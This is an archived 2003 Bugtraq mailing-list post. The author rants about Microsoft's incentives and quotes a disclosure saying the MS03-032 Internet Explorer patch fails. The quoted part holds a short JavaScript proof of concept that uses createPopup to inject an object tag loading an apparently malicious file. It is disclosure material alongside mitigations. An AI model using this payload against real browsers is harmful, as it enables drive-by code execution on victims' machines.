lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <3F5CEDD7.4040305@gs2.com.br>
From: bugtraq at gs2.com.br (Fabio Gomes de Souza)
Subject: BAD NEWS: Microsoft Security Bulletin MS03-032

Guys,

If Microsoft fixed IE holes, they would destroy the Adware/Spyware industry.

If Microsoft removed the Virus Support (TM) from their products, they 
would crash the entire antivirus industry (and this one is not small).

If Microsoft did a decent hotfix management solution, they would destroy 
the newly-created hotfix management industry.

If Microsoft managed the open ports of a Windows computer in a decent 
manner, Symantec, their friend who sells firewalls, would earn less money.

This list is endless. Too many cats to put in a bag.

Also endless is this issue. Market is the answer. When the market 
finally realize that AT LEAST the OS must be Open Source, these problems 
will disappear.


http-equiv@...ite.com escreveu:
> Since the cat somehow got out of the bag, and more importantly, this 
> is so blatantly obvious, herewith is the "Bad News":
> 
> The patch for Drew's object data=funky.hta doesn't work:
> 
> http://www.malware.com/badnews.html
> 
> <script>
>   var oPopup = window.createPopup();
> 
>   function showPopup() {
>     oPopup.document.body.innerHTML = "<object data=ouch.php>";
>     oPopup.show(0,0,1,1,document.body);
>   }
>   
>   showPopup()
> </script>
> 
> Notes:
> 
> 1. Disable Active Scripting
> 2. In case that does not work, uninstall Internet Explorer
> 3. http://www.eeye.com/html/Research/Advisories/AD20030820.html
> 4. This was sent to the manufacturer quite some time prior to this
>    going out. Surprisingly no immediate acknowledgement
> 5. This is so blatantly obvious, in particular because it is
>    the coupling of two known issues[one current + one from 2002]:
> 
>    http://www.securityfocus.com/bid/3867/
> 
> It is beyond comprehension why this was not checked from the       
> outset as it is a known issue plus file://::{CLSID}in the control 
> panel in the object tag still functions to date. 
> 6. At this stage one must really question the compentency of this 
> particular operation. This is a pathetic oversight.
> 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ